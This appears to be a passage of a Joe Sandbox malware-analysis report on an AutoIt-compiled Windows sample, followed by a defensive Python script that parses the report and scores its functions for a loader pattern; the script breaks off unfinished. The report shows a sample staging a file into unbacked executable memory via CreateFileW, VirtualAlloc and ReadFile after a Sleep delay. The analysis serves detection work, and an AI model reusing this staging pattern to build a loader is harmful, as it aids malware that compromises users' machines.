                                            • Instruction Fuzzy Hash: 1BB2C771608741DFD724DF24D894BAAB7E5FF84304F14591EE89AB72A2D770E888CB42

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00E791E9: __time64.LIBCMT ref: 00E791F3
                                              • Part of subcall function 00E15045: _fseek.LIBCMT ref: 00E1505D
                                            • __wsplitpath.LIBCMT ref: 00E794BE
                                              • Part of subcall function 00E3432E: __wsplitpath_helper.LIBCMT ref: 00E3436E
                                            • _wcscpy.LIBCMT ref: 00E794D1
                                            • _wcscat.LIBCMT ref: 00E794E4
                                            • __wsplitpath.LIBCMT ref: 00E79509
                                            • _wcscat.LIBCMT ref: 00E7951F
                                            • _wcscat.LIBCMT ref: 00E79532
                                              • Part of subcall function 00E7922F: _memmove.LIBCMT ref: 00E79268
                                              • Part of subcall function 00E7922F: _memmove.LIBCMT ref: 00E79277
                                            • _wcscmp.LIBCMT ref: 00E79479
                                              • Part of subcall function 00E799BE: _wcscmp.LIBCMT ref: 00E79AAE
                                              • Part of subcall function 00E799BE: _wcscmp.LIBCMT ref: 00E79AC1
                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E796DC
                                            • _wcsncpy.LIBCMT ref: 00E7974F
                                            • DeleteFileW.KERNEL32(?,?), ref: 00E79785
                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E7979B
                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E797AC
                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E797BE
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                            • String ID:
                                            • API String ID: 1500180987-0
                                            • Opcode ID: acac4255d358f5c2868ae6a0a1d0fa8611951b2c587e6053f757c9f17d076931
                                            • Instruction ID: 6b7127e8fe06ecbccee9d30ac8b44b4140d12e95a9fd87ee79e15d00b501b666
                                            • Opcode Fuzzy Hash: acac4255d358f5c2868ae6a0a1d0fa8611951b2c587e6053f757c9f17d076931
                                            • Instruction Fuzzy Hash: 21C11DB1900219AEDF11DF95CC85ADEBBBDAF45310F0050AAF609F7151DB709A848F65

                                            Control-flow Graph

                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00E13074
                                            • RegisterClassExW.USER32(00000030), ref: 00E1309E
                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E130AF
                                            • InitCommonControlsEx.COMCTL32(?), ref: 00E130CC
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E130DC
                                            • LoadIconW.USER32(000000A9), ref: 00E130F2
                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E13101
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                            • API String ID: 2914291525-1005189915
                                            • Opcode ID: e82e20747704f9b30521ba84e1e857ef10b5242c762d491671c19c1e630a67fb
                                            • Instruction ID: 7b0109dedabb7f5ae15af8d3957f5d05fb0cc6f4d278c2c0d07071ad1a682b39
                                            • Opcode Fuzzy Hash: e82e20747704f9b30521ba84e1e857ef10b5242c762d491671c19c1e630a67fb
                                            • Instruction Fuzzy Hash: 2D3136B5805309AFDB10CFA5EC85AD9BBF4FB09310F20416BE590F62A0E3B50599CF51

                                            Control-flow Graph

                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00E13074
                                            • RegisterClassExW.USER32(00000030), ref: 00E1309E
                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E130AF
                                            • InitCommonControlsEx.COMCTL32(?), ref: 00E130CC
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E130DC
                                            • LoadIconW.USER32(000000A9), ref: 00E130F2
                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E13101
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                            • API String ID: 2914291525-1005189915
                                            • Opcode ID: f216d678ccb7cec78ea53e6b5cac24f7db9e3fab55d347b8b6737502269f757b
                                            • Instruction ID: d98fd3fc1691ef3c855caf4ae9f88010ea01dbda34b1352664c5253e1a51f7d9
                                            • Opcode Fuzzy Hash: f216d678ccb7cec78ea53e6b5cac24f7db9e3fab55d347b8b6737502269f757b
                                            • Instruction Fuzzy Hash: 8B21AEB5911218AFDB009FE6E889ADDBBF8FB08700F10412BEA10F62A0D7B145589F91

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00E14864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00ED62F8,?,00E137C0,?), ref: 00E14882
                                              • Part of subcall function 00E3074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E172C5), ref: 00E30771
                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E17308
                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E4ECF1
                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E4ED32
                                            • RegCloseKey.ADVAPI32(?), ref: 00E4ED70
                                            • _wcscat.LIBCMT ref: 00E4EDC9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                            • API String ID: 2673923337-2727554177
                                            • Opcode ID: d0c5c42261d6f3c2d0526f58a120b20bb8f138c52afc5c484bf2a8ec5eb9910b
                                            • Instruction ID: 41aae645c07acfc64a0ce156dd4c7377fb87ac4a5b00ba0875160f277cdaa08a
                                            • Opcode Fuzzy Hash: d0c5c42261d6f3c2d0526f58a120b20bb8f138c52afc5c484bf2a8ec5eb9910b
                                            • Instruction Fuzzy Hash: EA714AB15093419EC714DF26E88589BBBE8FF98740F40692FF485B32B0EB309989CB51

                                            Control-flow Graph

                                            Control-flow graph (rendered figure not reproduced): basic blocks e13633-e13776 plus an out-of-line region e4d2bf-e4d3a9; nodes call DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus, with internal calls to e211d0, e211f3, e72a16, e144cb, e13114, e14531, e6817e, e145df and e143db. Executed/not-executed colouring is lost.
                                            APIs
                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00E136D2
                                            • KillTimer.USER32(?,00000001), ref: 00E136FC
                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E1371F
                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E1372A
                                            • CreatePopupMenu.USER32 ref: 00E1373E
                                            • PostQuitMessage.USER32(00000000), ref: 00E1375F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                            • String ID: TaskbarCreated$%
                                            • API String ID: 129472671-3835587964
                                            • Opcode ID: 851dfe439b06472f91d60c0fdad13c204b42e38d9b1e4f5a9b3d1c0482ea06a1
                                            • Instruction ID: 951c880b18af09d796b948050eb196ad2e8ebc26ecab5b1cacfebf820ae54c46
                                            • Opcode Fuzzy Hash: 851dfe439b06472f91d60c0fdad13c204b42e38d9b1e4f5a9b3d1c0482ea06a1
                                            • Instruction Fuzzy Hash: FD41E4F1205145AFDB149F75FC09BFE37A5EB40300F14212BF502F62F2DA649E95A661

                                            Control-flow Graph

                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00E13A62
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00E13A71
                                            • LoadIconW.USER32(00000063), ref: 00E13A88
                                            • LoadIconW.USER32(000000A4), ref: 00E13A9A
                                            • LoadIconW.USER32(000000A2), ref: 00E13AAC
                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E13AD2
                                            • RegisterClassExW.USER32(?), ref: 00E13B28
                                              • Part of subcall function 00E13041: GetSysColorBrush.USER32(0000000F), ref: 00E13074
                                              • Part of subcall function 00E13041: RegisterClassExW.USER32(00000030), ref: 00E1309E
                                              • Part of subcall function 00E13041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E130AF
                                              • Part of subcall function 00E13041: InitCommonControlsEx.COMCTL32(?), ref: 00E130CC
                                              • Part of subcall function 00E13041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E130DC
                                              • Part of subcall function 00E13041: LoadIconW.USER32(000000A9), ref: 00E130F2
                                              • Part of subcall function 00E13041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E13101
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                            • String ID: #$0$AutoIt v3
                                            • API String ID: 423443420-4155596026
                                            • Opcode ID: a71c7602f8155ab786cc43902995ac2313639439a6f78a236d3abffab37ac587
                                            • Instruction ID: b6900a113178fe687953091c7a1a6836129e4b319a08cace6a5f6444d8bbb028
                                            • Opcode Fuzzy Hash: a71c7602f8155ab786cc43902995ac2313639439a6f78a236d3abffab37ac587
                                            • Instruction Fuzzy Hash: 7E212871A12308AFEB109FA6FC09B9D7BB5FB08711F10412BF504BA2B0D7B656588F94

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b
                                            • API String ID: 1825951767-3834736419
                                            • Opcode ID: f3c8aa2ccfde4a1b85c2137897f1fbe81ad2dfa660d06bcdc438ecac97c9ed98
                                            • Instruction ID: 5f6626af0e5f505bc3bc5cb7094e131f737f159eb7e1d916933a273fa3353666
                                            • Opcode Fuzzy Hash: f3c8aa2ccfde4a1b85c2137897f1fbe81ad2dfa660d06bcdc438ecac97c9ed98
                                            • Instruction Fuzzy Hash: E1A160729102199ACF04EFA0DC95EEEB7B9FF54300F44242AF416B7192DF749A89CB60

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00E303A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E303D3
                                              • Part of subcall function 00E303A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E303DB
                                              • Part of subcall function 00E303A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E303E6
                                              • Part of subcall function 00E303A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E303F1
                                              • Part of subcall function 00E303A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E303F9
                                              • Part of subcall function 00E303A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E30401
                                              • Part of subcall function 00E26259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E1FA90), ref: 00E262B4
                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E1FB2D
                                            • OleInitialize.OLE32(00000000), ref: 00E1FBAA
                                            • CloseHandle.KERNEL32(00000000), ref: 00E549F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                            • String ID: <g$\d$%$c
                                            • API String ID: 1986988660-619945097
                                            • Opcode ID: fea12d5970af68eeaa7ba70fda50572be156b588b34818e6b632282a74bc89d2
                                            • Instruction ID: 3d661231104fc8750e6a842a867b0bdd1610e364c86669eff50495b93a6e7eed
                                            • Opcode Fuzzy Hash: fea12d5970af68eeaa7ba70fda50572be156b588b34818e6b632282a74bc89d2
                                            • Instruction Fuzzy Hash: FE81A8B09022508FC784EF6AFA526597BF4FB88708710A52BD028FB3A2EB35444DCF50

                                            Control-flow Graph

                                            Control-flow graph (rendered figure not reproduced): basic blocks d425c0-d428c2; nodes call CreateFileW, VirtualAlloc (twice), ReadFile, VirtualFree (twice) and FindCloseChangeNotification, with internal calls to d40000, d434d0, d43720 and d43530; a back-edge from d427de-d427e7 to the CreateFileW block (997) forms a retry loop around open/allocate/read. Executed/not-executed colouring is lost.
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D42691
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D428B7
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateFileFreeVirtual
                                            • String ID:
                                            • API String ID: 204039940-0
                                            • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                            • Instruction ID: 6562daa1cfeab776a0d3078eae68855fee3ce546870129068dbd7b9098d65aea
                                            • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                            • Instruction Fuzzy Hash: 53A10374E00209EBDB14CFA4C894BEEBBB5FF48304F648559E501BB280D7759A81DBA4

                                            Control-flow Graph

                                            Control-flow graph (rendered figure not reproduced): a single basic block e139e7-e13a57 that calls CreateWindowExW twice and ShowWindow twice.
                                            APIs
                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E13A15
                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E13A36
                                            • ShowWindow.USER32(00000000,?,?), ref: 00E13A4A
                                            • ShowWindow.USER32(00000000,?,?), ref: 00E13A53
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$CreateShow
                                            • String ID: AutoIt v3$edit
                                            • API String ID: 1584632944-3779509399
                                            • Opcode ID: c117b1d80d98ab99cdc0356cf55fa32582529fd82df093b6725258dcab976ea2
                                            • Instruction ID: f27e4d1dfa222d424f42a5adac022d58d8e8e332b9b42b8716991ce023e39c92
                                            • Opcode Fuzzy Hash: c117b1d80d98ab99cdc0356cf55fa32582529fd82df093b6725258dcab976ea2
                                            • Instruction Fuzzy Hash: F2F0D471642290BEEE311B67BC49E672F7DE7C6F50B00412BF904F61B0C6A61859DAB0

                                            Control-flow Graph

                                            Control-flow graph (rendered figure not reproduced): basic blocks d423b0-d42574; nodes call CreateFileW, VirtualAlloc, ReadFile and ExitProcess, with internal calls to d40000, d422a0, d422e0, d412a0 and d42330; the short blocks following each of CreateFileW, VirtualAlloc and ReadFile branch straight to the final block d4256f-d42574, as does the ExitProcess block. Executed/not-executed colouring is lost.
                                            APIs
                                              • Part of subcall function 00D422A0: Sleep.KERNELBASE(000001F4), ref: 00D422B1
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D424AE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateFileSleep
                                            • String ID: UPZNG328X4M74N
                                            • API String ID: 2694422964-3359460464
                                            • Opcode ID: 34586e6d22d2e5e43d00ba4fbe4e020b4934f5a1fc211c8e2c21eaed95b4668b
                                            • Instruction ID: be05e2ff61047341eabd35ad079f2d6b3e60896caa7388bf5f2af98979949387
                                            • Opcode Fuzzy Hash: 34586e6d22d2e5e43d00ba4fbe4e020b4934f5a1fc211c8e2c21eaed95b4668b
                                            • Instruction Fuzzy Hash: 60517E30D14249EBEF11DBA4C815BEFBB78AF54300F504199E609BB2C0D7B95B45CBA5
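The two functions in the region at 00D40000 (00D425C0 above and 00D423B0 here) sit in memory that is not backed by a PE image, open a file with CreateFileW and, per their control-flow graphs, pass its contents through VirtualAlloc and ReadFile. The Python below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it parses the report's own per-function format (the "APIs", "Source File" and "control_flow_graph" lines) and scores each function for that file-to-memory loader pattern, so the same check can be run over a full export of this report instead of by eye. The sample text inside is constructed from abbreviated copies of lines on this page; the scoring weights are the example's own, and treating the fifth dotted field of the .sdmp name as a Windows PAGE_* protection constant is an assumption about Joe Sandbox's file naming, not something the report states.

```python
"""Triage Joe Sandbox per-function blocks for the file-to-memory loader pattern.
Added example, not part of the Joe Sandbox report and not Joe Sandbox code; the
scoring weights are its own. Reading the fifth dotted field of the .sdmp name as a
Windows PAGE_* constant (0x40 = PAGE_EXECUTE_READWRITE) is an assumption."""
import re
from collections import namedtuple
from dataclasses import dataclass, field
# Constructed sample: abbreviated copies of three blocks from this report (graph lines cut to their API nodes).
SAMPLE_REPORT = """\
Control-flow Graph
control_flow_graph 1116 d423b0-d424b8 call d40000 call d422a0 CreateFileW 1127 d424d6-d424f0 VirtualAlloc 1129 d424f4-d4250b ReadFile 1137 d42565-d4256d ExitProcess
APIs
  • Part of subcall function 00D422A0: Sleep.KERNELBASE(000001F4), ref: 00D422B1
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D424AE
• Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
Control-flow Graph
control_flow_graph 994 d425c0-d4266e call d40000 997 d42675-d4269b call d434d0 CreateFileW 1007 d426b9-d426d3 VirtualAlloc 1014 d426da-d426f1 ReadFile 1017 d428ac-d428b7 VirtualFree
APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D42691
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D428B7
• Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
APIs
• CreatePopupMenu.USER32 ref: 00E1373E
• Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
"""
API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?(?P<api>[A-Za-z_]\w*)"
                    r"\.(?P<mod>[A-Z0-9]+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")
SRC_RE = re.compile(r"^\s*•\s*Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<base>[0-9A-F]{8}),"
                    r"\s*based on PE:\s*(?P<pe>true|false)")
GRAPH_RE = re.compile(r"^\s*control_flow_graph\s+(?P<body>.+)$")
RANGE_RE = re.compile(r"\b([0-9a-f]{5,8})-[0-9a-f]{5,8}\b")               # basic-block range, e.g. d423b0-d424b8
NODE_API_RE = re.compile(r"\b(?=[A-Za-z0-9_]*[a-z])[A-Z][A-Za-z0-9_]*\b")  # CamelCase API names on CFG nodes
ApiCall = namedtuple("ApiCall", "api module ref via_subcall")
@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)       # ApiCall entries from the "APIs" list
    graph_apis: list = field(default_factory=list)  # API names read off control_flow_graph nodes
    graph_entry: int = None                         # start of the first basic block in the CFG
    dump: str = ""                                  # .sdmp file the code was lifted from
    pe_backed: bool = None                          # "based on PE: true/false"

    def entry(self):
        own = [c.ref for c in self.calls if not c.via_subcall]  # subcall refs lie in other functions
        addr = self.graph_entry if self.graph_entry is not None else min(own, default=None)
        return f"{addr:08X}" if addr is not None else "?"

def parse_blocks(text):
    """A block starts at 'Control-flow Graph', or at 'APIs' once the previous block has its dump source."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Control-flow Graph" or (line == "APIs" and (cur is None or cur.dump)):
            cur = FunctionBlock()
            blocks.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.match(raw)):
            cur.calls.append(ApiCall(m["api"], m["mod"], int(m["ref"], 16), m["sub"] is not None))
        elif (m := GRAPH_RE.match(raw)):
            r = RANGE_RE.search(m["body"])
            cur.graph_entry = int(r.group(1), 16) if r else None
            cur.graph_apis.extend(NODE_API_RE.findall(m["body"]))
        elif (m := SRC_RE.match(raw)):
            cur.dump, cur.pe_backed = m["dump"], m["pe"] == "true"
    return blocks

OPEN, ALLOC = {"CreateFileW", "CreateFileA", "NtCreateFile"}, {"VirtualAlloc", "VirtualAllocEx", "NtAllocateVirtualMemory"}
READ, DELAY = {"ReadFile", "NtReadFile"}, {"Sleep", "SleepEx", "NtDelayExecution"}
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80

def page_protect(dump):
    """Assumed .sdmp layout pid.n.ts.base.PROTECT.state.type...: return the fifth field as an int."""
    parts = dump.split(".")
    return int(parts[4], 16) if len(parts) > 4 and re.fullmatch(r"[0-9A-Fa-f]{8}", parts[4]) else None

def score(block):
    """Return (points, reasons); the weights are this example's own heuristic."""
    names = {c.api for c in block.calls} | set(block.graph_apis)
    prot = page_protect(block.dump) if block.dump else None
    rwx = prot is not None and bool(prot & (PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY))
    rules = [
        (block.pe_backed is False and bool(block.calls), 2, "Win32 calls issued from memory not backed by a PE image"),
        (rwx, 1, f"region protection 0x{prot or 0:02X} is writable and executable (assumed field)"),
        (bool(names & OPEN and names & ALLOC and names & READ), 2, "open + allocate + read: file staged into fresh memory"),
        (bool(names & DELAY), 1, "delay before the load (Sleep)"),
    ]
    hits = [(pts, why) for ok, pts, why in rules if ok]
    return sum(p for p, _ in hits), [w for _, w in hits]

def triage(text):
    rows = []
    for b in parse_blocks(text):
        pts, why = score(b)
        rows.append({"entry": b.entry(), "pe_backed": b.pe_backed, "score": pts, "reasons": why})
    return sorted(rows, key=lambda r: r["score"], reverse=True)

if __name__ == "__main__":
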